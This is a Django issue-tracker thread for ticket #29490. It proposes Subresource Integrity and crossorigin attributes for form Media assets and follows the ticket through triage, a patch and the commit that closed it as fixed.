[Django] #29490: Subresource integrity for form assets
Django
---------------------------------------+------------------------
Reporter: Meiyer | Owner: nobody
Type: New feature | Status: new
Component: Forms | Version: master
Severity: Normal | Keywords:
Triage Stage: Unreviewed | Has patch: 0
Needs documentation: 0 | Needs tests: 0
Patch needs improvement: 0 | Easy pickings: 0
UI/UX: 0 |
---------------------------------------+------------------------
[https://developer.mozilla.org/en-
US/docs/Web/Security/Subresource_Integrity SRI] gives the web site author
some guarantees that an external resource (typically, a script), included
within the web page, has not been altered. For example, various external
libraries are loaded from a CDN or another third-party repository,
implicitly trusting that repositories’ security, but these libraries can
be modified or tampered with to include malicious code, with the web site
author not aware that this malicious code is now running on their web site
in the context of their own web application. SRI prevents the loading of
such resources if they were modified.
SRI is implemented by the means of the “integrity” attribute on the
`<LINK>` and `<SCRIPT>` HTML elements. It is relevant to Django, because
the form assets (“Media”) may point to resources on external repositories.
But Django does not allow any way to specify the
[https://developer.mozilla.org/en-
US/docs/Web/Security/Subresource_Integrity#Using_Subresource_Integrity
“integrity“ attribute] (and the [https://developer.mozilla.org/en-
US/docs/Web/HTML/CORS_settings_attributes “crossorigin” attribute]) for
the assets of the forms.
I suggest modifying the `Media`
[https://docs.djangoproject.com/en/2.0/topics/forms/media/#assets-as-a
-static-definition class definitions] such that the assets are not a
simple list but a `dict` (with keys such as `src`, `integrity`,
`crossorigin`), resulting in corresponding HTML elements being rendered
appropriately. There can be a fallback to the simpler case when a `list`
or `tuple` is provided, for backwards-compatibility.
--
Ticket URL: <https://code.djangoproject.com/ticket/29490>
Django <https://code.djangoproject.com/>
The Web framework for perfectionists with deadlines.
Django
Reporter: Meiyer | Owner: nobody
Type: New feature | Status: new
Component: Forms | Version: master
Keywords: | Triage Stage: Accepted
Has patch: 0 | Needs documentation: 0
Needs tests: 0 | Patch needs improvement: 0
Easy pickings: 0 | UI/UX: 0
Changes (by Claude Paroz):
* stage: Unreviewed => Accepted
--
Ticket URL: <https://code.djangoproject.com/ticket/29490#comment:1>
Django
Reporter: Meiyer | Owner: nobody
Type: New feature | Status: new
Component: Forms | Version: master
Keywords: | Triage Stage: Accepted
Needs tests: 0 | Patch needs improvement: 0
Easy pickings: 0 | UI/UX: 0
Comment (by Tim Graham):
I'd say maybe. There's also some thought in #22298 to deprecate the
`Media` class.
--
Ticket URL: <https://code.djangoproject.com/ticket/29490#comment:2>
Django
Reporter: Meiyer | Owner: nobody
Type: New feature | Status: new
Component: Forms | Version: master
Keywords: | Triage Stage: Accepted
Needs tests: 0 | Patch needs improvement: 0
Easy pickings: 0 | UI/UX: 0
Comment (by Claude Paroz):
Based on what I suggested in #29586 and
[https://groups.google.com/forum/#!msg/django-
developers/KYmNnvwXDUI/5zfPx27OBwAJ this discussion], here's what could be
a possible implementation (still WIP):
https://github.com/claudep/django/commit/89aa4c04dbffcbafc05c3e2053b2262be8de4d3d
Considering it was suggested the original proposal should be first
implemented as a 3rd party app, I don't want to go further without a green
light for integrating such an implementation to Django.
--
Ticket URL: <https://code.djangoproject.com/ticket/29490#comment:3>
Django
Reporter: Meiyer | Owner: nobody
Type: New feature | Status: new
Severity: Normal | Resolution:
Keywords: | Triage Stage: Accepted
Needs tests: 0 | Patch needs improvement: 0
Easy pickings: 0 | UI/UX: 0
Changes (by Claude Paroz):
* has_patch: 0 => 1
Comment:
In this [https://github.com/django/django/pull/15349 new PR], I tried
adding the minimal possible support in Django to allow for some custom
rendering of form media. This would allow people to add basic support for
custom attributes, as demonstrated by the implementation supporting
`integrity` in tests.
--
Ticket URL: <https://code.djangoproject.com/ticket/29490#comment:4>
Django
Reporter: Meiyer | Owner: Claude Paroz
Type: New feature | Status: assigned
Component: Forms | Version: dev
Severity: Normal | Resolution:
Keywords: | Triage Stage: Accepted
Needs tests: 0 | Patch needs improvement: 0
Easy pickings: 0 | UI/UX: 0
Changes (by Mariusz Felisiak):
* owner: nobody => Claude Paroz
* status: new => assigned
--
Ticket URL: <https://code.djangoproject.com/ticket/29490#comment:5>
Django
Reporter: Meiyer | Owner: Claude Paroz
Type: New feature | Status: assigned
Component: Forms | Version: dev
Severity: Normal | Resolution:
Has patch: 1 | Needs documentation: 0
Needs tests: 0 | Patch needs improvement: 0
Easy pickings: 0 | UI/UX: 0
Changes (by Mariusz Felisiak):
* stage: Accepted => Ready for checkin
--
Ticket URL: <https://code.djangoproject.com/ticket/29490#comment:6>
Django
Reporter: Meiyer | Owner: Claude Paroz
Component: Forms | Version: dev
Severity: Normal | Resolution: fixed
Keywords: | Triage Stage: Ready for checkin
Needs tests: 0 | Patch needs improvement: 0
Easy pickings: 0 | UI/UX: 0
Changes (by Mariusz Felisiak <felisiak.mariusz@…>):
* status: assigned => closed
* resolution: => fixed
Comment:
In [changeset:"4c76ffc2d6c77c850b4bef8d9acc197d11c47937" 4c76ffc2]:
{{{
#!CommitTicketReference repository=""
revision="4c76ffc2d6c77c850b4bef8d9acc197d11c47937"
Fixed #29490 -- Added support for object-based Media CSS and JS paths.
}}}
--
Ticket URL: <https://code.djangoproject.com/ticket/29490#comment:7>